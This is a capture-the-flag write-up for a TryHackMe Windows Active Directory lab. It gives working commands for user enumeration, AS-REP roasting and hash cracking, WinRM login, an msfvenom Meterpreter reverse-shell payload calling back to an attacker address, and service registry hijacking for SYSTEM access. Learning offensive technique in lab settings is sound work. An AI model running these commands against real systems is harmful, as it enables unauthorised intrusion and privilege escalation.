This writeup covers the Services CTF challenge on TryHackMe, featuring Active Directory enumeration, AS-REP Roasting, SMB exploitation, and service-level privilege escalation in a Windows environment.
Target IP: 10.10.45.7
Nmap Scans:
sudo nmap -T4 -vvv -sV -sC -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389 10.10.45.7Initial reconnaissance identified the host as a probable Domain Controller running IIS 10.0. Browsing `/about.html` and `/portfolio.html`
revealed internal usernames and emails such as [email protected], which established a naming convention for users.
Kerbrute enumeration confirmed user validity:
kerbrute -d services.local userenum ~/users.txt --dc 10.10.45.7User j.rock had AS-REP roasting enabled. Using Impacket, the hash was retrieved and cracked offline using Hashcat:
impacket-GetNPUsers services.local/j.rock -no-pass -dc-ip 10.10.45.7
hashcat -a 0 -m 18200 hash ~/rockyou.txt -OCracked password: Serviceworks1. Access to SMB was tested and a connection was established:
smbclient \\\\10.10.45.7\\C$ -U services.local/j.rock%Serviceworks1Flag user.txt was retrieved from C:\Users\j.rock\Desktop\.
RDP was unavailable, but WinRM was accessible. A PowerShell shell was launched using:
evil-winrm -i 10.10.45.7 -u 'j.rock' -p 'Serviceworks1'A Meterpreter payload was created, uploaded, and executed to upgrade the shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.52.19 LPORT=4445 -f exe > rev_tcp_meterpreterx64.exeWinPEAS revealed `j.rock` had WriteKey and GenericWrite permissions over multiple services.
Exploitation steps:
reg add HKLM\SYSTEM\CurrentControlSet\Services\AppHostSvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\j.rock\Documents\payload.exe /fThis granted a shell as NT AUTHORITY\SYSTEM, allowing retrieval of the final Administrator flag.